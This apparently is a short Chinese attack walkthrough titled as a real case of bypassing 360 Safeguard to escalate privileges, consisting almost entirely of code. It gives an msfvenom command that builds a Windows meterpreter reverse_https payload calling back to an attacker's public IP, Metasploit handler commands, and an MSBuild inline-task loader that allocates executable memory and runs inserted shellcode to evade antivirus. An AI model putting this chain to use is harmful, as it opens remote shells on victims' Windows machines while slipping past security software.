绕过360安全卫士提权实战案例

root@kali:~# msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_https LHOST=公网IP地址 LPORT=5555 -f csharp
msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_httpsmsf5 exploit(multi/handler) > set lhost 公网IP地址msf5 exploit(multi/handler) > set lport 5555msf5 exploit(multi/handler) > exploit

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">         <!-- This inline task executes shellcode. -->         <!-- C:WindowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe SimpleTasks.csproj -->         <!-- Save This File And Execute The Above Command -->         <!-- Author: Casey Smith, Twitter: @subTee -->         <!-- License: BSD 3-Clause -->    <Target Name="Hello">      <ClassExample />    </Target>    <UsingTask      TaskName="ClassExample"      TaskFactory="CodeTaskFactory"      AssemblyFile="C:WindowsMicrosoft.NetFrameworkv4.0.30319Microsoft.Build.Tasks.v4.0.dll" >      <Task>
        <Code Type="Class" Language="cs">        <![CDATA[    using System;    using System.Runtime.InteropServices;    using Microsoft.Build.Framework;    using Microsoft.Build.Utilities;    public class ClassExample :  Task, ITask    {               private static UInt32 MEM_COMMIT = 0x1000;                private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;                [DllImport("kernel32")]        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);                [DllImport("kernel32")]        private static extern IntPtr CreateThread(                    UInt32 lpThreadAttributes,        UInt32 dwStackSize,        UInt32 lpStartAddress,        IntPtr param,        UInt32 dwCreationFlags,        ref UInt32 lpThreadId                   );      [DllImport("kernel32")]        private static extern UInt32 WaitForSingleObject(                   IntPtr hHandle,        UInt32 dwMilliseconds        );                public override bool Execute()      {        byte[] shellcode = new byte[] { Insert Shellcode Here };
          UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,      MEM_COMMIT, PAGE_EXECUTE_READWRITE);          Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);          IntPtr hThread = IntPtr.Zero;          UInt32 threadId = 0;          IntPtr pinfo = IntPtr.Zero;          hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);          WaitForSingleObject(hThread, 0xFFFFFFFF);          return true;      }     }             ]]>        </Code>      </Task>    </UsingTask>  </Project>